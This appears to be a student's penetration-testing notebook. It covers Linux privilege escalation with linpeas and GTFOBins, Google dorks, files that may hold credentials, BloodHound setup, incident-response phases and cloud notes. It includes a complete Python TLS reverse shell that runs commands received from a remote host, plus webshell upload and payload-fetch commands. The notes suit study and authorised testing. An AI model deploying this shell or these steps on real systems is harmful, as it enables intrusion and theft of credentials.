If you can emulate the firmware, just run linpeas inside of it: cp /path/to/linpeas.sh /mnt/linpeas.sh chroot /mnt #Supposing you have mounted the firmware FS in /mnt bash /linpeas.sh -o software_information,interesting_files,api_keys_regex If you cannot emulate the firmware, use the -f </path/to/folder param:
bash /path/to/linpeas.sh -f /path/to/folder
-rw-r--r-- 12 linuxize users 12.0K Apr 8 20:51 filename.txt
|[-][-][-]- [------] [---]
| | | | | | |
| | | | | | +-----------> 7. Group
| | | | | +-------------------> 6. Owner
| | | | +--------------------------> 5. Alternate Access Method
| | | +----------------------------> 4. Others Permissions
| | +-------------------------------> 3. Group Permissions
| +----------------------------------> 2. Owner Permissions
+------------------------------------> 1. File Type
https://linuxize.com/post/chmod-command-in-linux/
Getting Processes/Services to Start on Boot
Some applications can be started on the boot of the system that we own. For example, web servers, database servers or file transfer servers. This software is often critical and is often told to start during the boot-up of the system by administrators.
Enter the use of systemctl -- this command allows us to interact with the systemd process/daemon. Continuing on with our example, systemctl is an easy to use command that takes the following formatting: systemctl [option] [service]
Start
Stop
Enable
Disable
Here we're running echo "Hi THM" , where we expect the output to be returned to us like it is at the start. But after adding the & operator to the command, we're instead just given the ID of the echo process rather than the actual output -- as it is running in the background.
Check the access permissions of your users and in case your web application provides role-based access, then ensure users are getting access only to those parts of the web application to which they have the right. Nothing more or less.
User Session Testing This is very important. Ensure that user sessions end upon log off. Because if they don’t, that valid session can be easily hijacked by hackers – this process is known as session hijacking – for carrying out malicious activity.
Brute Force Attack Testing Using appropriate testing tools, ensure your web application stays safe against brute force attacks.
DoS (Denial of Service) Attack Testing Also ensure your web application stays safe against DoS (Denial of Service) attacks by using appropriate testing tools.
Directory Browsing Ensure directory browsing is disabled on the web server which hosts your web application. Because if you don’t, you’ll be giving hackers easy access to your restricted files.
python -c 'import pty;pty.spawn("/bin/bash")'
Add an additional URL as a get parameter in a website
Http://example.com/?destination=https://google.com
Source - https://www.youtube.com/watch?v=jwBRgaIRdgs
“<!--” denotes the beginning of a comment in an html page
Inputting link to a user field
To input mallicuous link into prompt
<a href="url">link text</a>
Nmap only supports ethernet interfaces (including most 802.11 wireless cards and many VPN clients) for raw packet scans. Unless you use the -sT -Pn options, RAS connections (such as PPP dialups) and certain VPN clients are not supported. This support was dropped when Microsoft removed raw TCP/IP socket support in Windows XP SP2. Now Nmap must send lower-level ethernet frames instead.
VPN issues
https://nmap.org/book/inst-windows.html
cache:[url] Shows the version of the web page from the search engine’s cache.
related:[url] Finds web pages that are similar to the specified web page.
info:[url] Presents some information that Google has about a web page, including similar pages, the cached version of the page, and sites linking to the page.
site:[url] Finds pages only within a particular domain and all its subdomains.
intitle:[text] or allintitle:[text] Finds pages that include a specific keyword as part of the indexed title tag. You must include a space between the colon and the query for the operator to work in Bing.
allinurl:[text] Finds pages that include a specific keyword as part of their indexed URLs.
meta:[text] Finds pages that contain the specific keyword in the meta tags.
filetype:[file extension] Searches for specific file types.
intext:[text], allintext:[text], inbody:[text] Searches text of page. For Bing and Yahoo the query is inbody:[text]. For DuckDuckGo the query is intext:[text]. For Google either intext:[text] or allintext:[text] can be used.
inanchor:[text] Search link anchor text
location:[iso code] or loc:[iso code], region:[region code] Search for specific region. For Bing use location:[iso code] or loc:[iso code] and for DuckDuckGo use region:[iso code].An iso location code is a short code for a country for example, Egypt is eg and USA is us. https://en.wikipedia.org/wiki/ISO_3166-1
contains:[text] Identifies sites that contain links to filetypes specified (i.e. contains:pdf)
altloc:[iso code] Searches for location in addition to one specified by language of site (i.e. pt-us or en-us)
feed:[feed type, i.e. rss] Find RSS feed related to search term
hasfeed:[url] Finds webpages that contain both the term or terms for which you are querying and one or more RSS or Atom feeds.
ip:[ip address] Find sites hosted by a specific ip address
language:[language code] Returns websites that match the search term in a specified language
book:[title] Searches for book titles related to keywords
maps:[location] Searches for maps related to keywords
linkfromdomain:[url] Shows websites whose links are mentioned in the specified url (with errors)
https://securitytrails.com/blog/google-hacking-techniques
Use linpeas to identify avenues to escelate privleges privileges in linux. Linpeas must be served to the victim machine on a python3 http server or similar. To force victims to pull linpeas from your attacking machine use Wget. Example: wget 10.6.114.53:9999/linpeas.sh. The previous command pulls the “linpeas.sh” file from the hosting server.
* GTFOBins
GTFOBINs is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. The project collects legitimate functions of Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
Find the SUID files
The following command will list all of the SUID files in the system
find / -perm -u=s -type f 2>/dev/null
Find Processes running as root
ps aux | grep root
See logged in users
ps au
Can the user run anything as another user?
sudo -l
Check for unmounted file systems/drives
`lsblk`
source: https://safe.menlosecurity.com/https://pentest.coffee/linux-privilege-escalation-for-oscp-and-beyond-cheat-sheet-24fb9fe13058
list of config files, logfiles that could contain cleartext passwords
System Configuration Files
/etc/passwd: Historically used for storing passwords, though modern systems use it for account information and store hashed passwords in /etc/shadow.
/etc/shadow: Stores password hashes, but misconfigurations or weak hashing can lead to vulnerabilities.
/etc/group: Similar to /etc/passwd, but for group information.
/etc/gshadow: Group password hashes, similar to /etc/shadow.
Application and Service Configuration Files
Web Server Config Files: Files like Apache's httpd.conf or Nginx's nginx.conf and associated site configuration files.
Database Config Files: Such as MySQL's my.cnf, PostgreSQL's pg_hba.conf, or similar files for other database systems.
Application-specific Config Files: Files like config.php (for PHP apps), settings.py (for Django apps), .env files, or other application configuration files.
FTP and SSH Config Files: Files like vsftpd.conf for vsFTPd or SSH daemon config files (sshd_config) might contain passwords for certain configurations.
VPN Config Files: For instance, OpenVPN configuration files (openvpn.conf) might include credentials.
User Home Directories
Shell Configuration and History Files: Files like .bashrc, .bash_history, .zshrc, .zsh_history, etc., may contain inadvertently stored passwords or sensitive commands.
.netrc: Used by FTP and other network clients to store credentials.
SSH Keys: Not clear-text passwords, but files like id_rsa in .ssh can be critical.
System and Application Log Files
Web Server Logs: (/var/log/apache2/access.log, /var/log/nginx/access.log, etc.) might inadvertently contain credentials passed through URLs or in POST requests.
Database Logs: SQL query logs could contain plain text credentials, especially in verbose logging modes.
Application Logs: Depending on the application, logs (/var/log/app_name/) might include sensitive information.
System Logs: (/var/log/syslog, /var/log/auth.log) can sometimes contain sensitive information, depending on the system activities and log configuration.
Miscellaneous Files
Cron Job Files: (/etc/crontab, /var/spool/cron/crontabs/) might contain scripts with embedded credentials.
Backup Files: Such as .bak, .old, files containing previous versions of configuration files.
.git Configuration Files: Repositories with configuration files or code that might contain hard-coded credentials.
Additional Places
.git Configuration: Repositories with stored credentials in configuration or code files.
Backup Files: Such as .bak, .old, .tmp, which might contain older versions of config files with passwords.
SSH Keys and Configurations: While not clear-text passwords, private SSH keys (id_rsa) are often equivalent to passwords and should be secured similarly.
Mac OS
Look into /var/logs/
/dev/shm
Use the directory /dev/shm to work out of to avoid writing files to the disk. This is a virtual directory that only exists in memory. Any files left behind here will be wiped when the system shuts down or restarts.
Questions:
Change stolen ssh keys to read only?
MISC
Windows stores its host file (equivilent to /etc/hosts) in the C:\Windows\System32\drives\etc\hosts.
PAssword Cracking
Basic Usage
WELCOME TO SETTING UP BLOODHOUND ENVIRONMENT**
The purpose of this is to enumerate the enviornment without needing to "own" a domained joined device within the network for an internal assessment.
Dependencies
-
Neo4j
-
Bloodhound
3.impacket
4.ldap3
5.dnspython
Bloodhound-Python
-
domain login credentials
-
Visiability towards a Domain Controller
Neo4j - package will come included with Kali OVA distros as well as the Kali ISO.
If not - https://installati.one/kalilinux/neo4j/
Run the following command:
sudo apt-get update
sudo apt-get -y install neo4j
OR
sudo apt update
sudo apt -y install neo4j
After installation is complete
Run the following command:
sudo neo4j console - this will start up the neo4j database locally on your host.
Navigate towards http://localhost:7474/
use default login of neo4j//neo4j - this will ask you to change your password. Feel free to change to whatever you would like to.
Finally leave the instance runnning within a terminal tab.
Bloodhound - this tool will come included within Kali OVA distros as well as the Kali ISO
If not - https://www.kali.org/tools/bloodhound/
Run the following command:
sudo apt install bloodhound
After installation is complete
Run bloodhound - a GUI window will appear for you within a login screen. Use your neo4j credentials you have changed earlier above in the neo4j setup.
Bloodhound-Python - This tool will NOT come included within Kali. You will have to navigate towards https://github.com/fox-it/BloodHound.py
Installation - Read the README.md carefully.
BloodHound.py requires - impacket, ldap3, dnspython
This can be done with:
sudo pip3 install bloodhound - this will install all requirements
After installation you will need to have domain credentials already owned, be already interally in the network, and be able to "see" a domain controller.
If all pre-reqs are met run the following command.
bloodhound-python -u <user> -p <password> -dc <domain controller> -disable-autogc -d <domain>
Feel free to add '-c all' to the end of the command if you wish to use more than just LDAP to gather more information about the domain.
This will create all json files within your current working directory.
Finally navigate back towards your Bloodhound GUI.
Go to "Upload Data" button on the right hand side.
Navigate towards your json files that bloodhound-python created and click "Open".
Allow Bloodhound to process your json files.
Once all json files have been processed you should be able to run the pre-built queries to see a nice visual view of the environment.
Crackmap exec
Powersploit
Incognito - token impersonation
Azure
Webshells
Cmd.aspx is a webshell. Reference htb box revel.
put /usr/share/webshells/aspx/cmdasp.aspx c.aspx
import os
import socket
import subprocess
import ssl
# Create a socket
def socket_create():
try:
global host
global port
global ssls
global s
host = '10.1.1.1'
port = 8443
s = socket.socket()
ssls = ssl.wrap_socket(
s,
ssl_version=ssl.PROTOCOL_TLSv1
)
except socket.error as msg:
print('Socket creation error: ' + str(msg))
# Connect to a remote socket
def socket_connect():
try:
ssls.connect((host, port))
ssls.send(str.encode(str(os.getcwd()) + ' > '))
except socket.error as msg:
print('Socket connection error: ' + str(msg))
# Receive commands from remote server and run on local machine
def receive_commands():
while True:
data = ssls.recv(1024)
data = data.decode("utf-8").strip()
print('Received: ' + data)
if data[:2] == 'cd':
os.chdir(data[3:])
ssls.send(str.encode(str(os.getcwd()) + ' > '))
elif len(data) > 0:
cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output_bytes = cmd.stdout.read() + cmd.stderr.read()
output_str = str(output_bytes.decode("utf-8"))
ssls.send(str.encode(output_str + str(os.getcwd()) + ' > '))
if len(output_str.split('\n')) > 2:
nL = 2
else:
nL = 0
print('Sent: ' + nL * '\n' + output_str)
if not data:
break
s.close()
def main():
socket_create()
socket_connect()
receive_commands()
if __name__ == '__main__':
main()
Variables - numbers, characters, text, decimal numbers, etc. int = integer just type out the number. no decimals double = decimal number float = decimal char = one single character in quotes example 'A'. to create a string of characters use []
Store characters use char. Examle usage of char - char variablename = G To use store multiple characters in one char variable, like a name use [] char variablename [] = "lewis";
To Store whole number(integers) use int Example - int samplenumber = 35;
Variables can be invoked using the percent sign % followed by the letter that corresponds to the type of data you are trying to represent.
Example:
int main () { char variablename [] = "lewis"; int samplenumber = 35; printf (%s is a man. \n" , variablename) ; printf ( "lewis is %d years old. \n , samplenumber) ; return 0; }
Method - is a container where you can put code. ";" - end of instruction "\n" - new line "" - is to escape characters. for instance if you wanted to print a special cahracter. use this to escape it. Example of printf function. printf ("There once was a man named george \n");
sample attack chain
Initial access through phishing
Kerbroast
DCsync
Dump registry
_________________________
Gain access - Initial access, Defense evasion, C2E
Establish foothold - Persistence, Discovery
Obtain Privs - Credential access, privesc, lateral movement
Process injection / Process hollowing
Freeze framework
Tpmtool - Tool can be used
ProcMon -https://gist.github.com/egre55/1df7db9c13648097f997432019f4a8e1
chisel - https://www.youtube.com/watch?v=pbR_BNSOaMk
#Preperation
Policy Development
Plan Creation
Team Formation
Tools and Resources
Training
Legal and Compliance Review
Integration with Business Continuity
#Detection
Monitoring
Detection Engineering
Threat Hunting
Threat Intelligence
Anomaly Detection
Security Assessmen
#Triage
Severity Assessment
Incident Categorization
Escalation
Stakeholder Communication
Resource Allocation
#Containment
Network Isolation
Logical Access Isolation
Forensics Automation
Communication with Affected Parties
Patch Management
Resource Disablement
#Analysis
Data Collection
Forensic Analysis
Log Analysis
Root Cause Analysis
Timeline Reconstruction
Security Posture Assessment
#Remediation
Patch Management
Credential Reset
Threat Eradication
Configuration Changes
Security Enhancements
Hardening
Documentation
# Recovery
# Post-Incident Activty
Incident response is a structured approach used to manage and address security breaches, cyberattacks, or other threats to an organization’s systems and data. The goal is to effectively manage the situation to minimize damage, reduce recovery time, and mitigate any future risk. The incident response process generally follows a cycle of well-defined principles and stages.
- Preparation Preparation is the first principle and is critical to ensuring that an organization can handle security incidents effectively. The better prepared you are, the quicker you can respond. This includes:
Developing an Incident Response Plan: A documented procedure detailing how incidents will be identified, reported, and managed. Establishing a Response Team: A dedicated team trained to handle security incidents (usually called the Computer Security Incident Response Team, or CSIRT). Training: Regularly training staff on security policies and awareness. Tools and Resources: Ensuring the right tools (e.g., detection systems, logging tools) and resources are in place. 2. Identification In this phase, the goal is to detect and accurately determine whether an incident has occurred. Identification involves:
Monitoring Systems: Continuously monitoring network traffic, endpoints, and logs to identify suspicious activities. Initial Assessment: Once a potential incident is identified, it must be assessed to confirm whether it is an actual security incident. Classifying the Incident: Determining the type, severity, and impact of the incident. This helps prioritize how the response should proceed. 3. Containment Once an incident is identified, the first priority is to contain it to prevent further damage. Containment can be split into two phases:
Short-term Containment: Implementing measures to stop the spread or impact of the attack. This could involve isolating compromised systems, closing off certain network segments, or disabling user accounts. Long-term Containment: Ensuring that affected systems are securely restored. This could involve applying security patches, making system backups, or preparing for full system recovery while preserving forensic evidence. 4. Eradication After containment, the next step is to remove the root cause of the incident. Eradication involves:
Eliminating the Threat: Removing malware, cleaning up infected systems, and closing exploited vulnerabilities. Verification: Ensuring that the threat has been fully removed, by scanning systems and reviewing logs to check for any remaining traces of the attacker or malware. 5. Recovery Once the incident has been contained and eradicated, it’s time to restore and validate the systems affected. The recovery phase includes:
Restoring Systems: Bringing systems back online safely, ensuring they are clean and secure. Testing: Verifying that systems are functioning normally and that there are no signs of reinfection or vulnerabilities. Monitoring: Closely monitoring systems to detect any abnormal behavior or potential follow-up attacks after recovery. 6. Lessons Learned After the incident has been resolved, it’s essential to review what happened, how it was handled, and how the organization can improve its defenses in the future. This phase involves:
Post-Incident Review: Conducting a meeting with the incident response team and stakeholders to go over what happened, what worked well, and what didn’t. Documenting the Incident: Writing an incident report that details the incident, including timelines, actions taken, and lessons learned. Improving the Incident Response Plan: Updating policies, procedures, and security controls based on the incident review to improve future responses. Key Principles of Incident Response: Speed and Efficiency: Respond as quickly as possible to minimize damage and disruption. Containment over Eradication: Contain first to prevent the spread of damage, then focus on eliminating the threat. Documentation: Document everything throughout the process to maintain a clear record for analysis and potential legal or compliance requirements. Communication: Clear, consistent communication between the incident response team, stakeholders, and external parties (e.g., legal teams or law enforcement). Continuous Improvement: Every incident should provide insights to improve future incident response strategies and reduce vulnerabilities.
Adversary gains foothold into the Account through compromised credentials User credentials => AWS Access Key and Secret Key Service Tokens => AWS Access Key, Secret Key and Session Token Leverages credentials to escalate privileges Performs one or more techniques, depending on objective, configuration and so on
How to develop persistence in AWS and other cloud platforms ?
Dockerscan is a tool that can be used to reverse shell using docker. Docker uses LD preload to add commands to the docker image LDpreload being present means that your docker image may be compromised. LD preload is an additional instruction that can be used to make an image execute a process. in this case a rev shell.
https://github.com/aquasecurity/trivy - Trivy (pronunciation) is a comprehensive and versatile security scanner. Trivy has scanners that look for security issues, and targets where it can find those issues.
Targets (what Trivy can scan):
Container Image Filesystem Git Repository (remote) Virtual Machine Image Kubernetes AWS
kubeshark hubble
7-October-24 class Questions:
Layered file system? Union mounting
unzip ipa - app.ipa -d app
- Aws WAFs in affition to may other wafs based on modsecurity waf only inspects 8kb of data per payload
- Microsoft teams installs its application files in the users local profile folder - %LocalAppData%\Microsoft\Teams directory within each user's profile. This per-user installation approach allows Teams to update itself without requiring administrative privileges.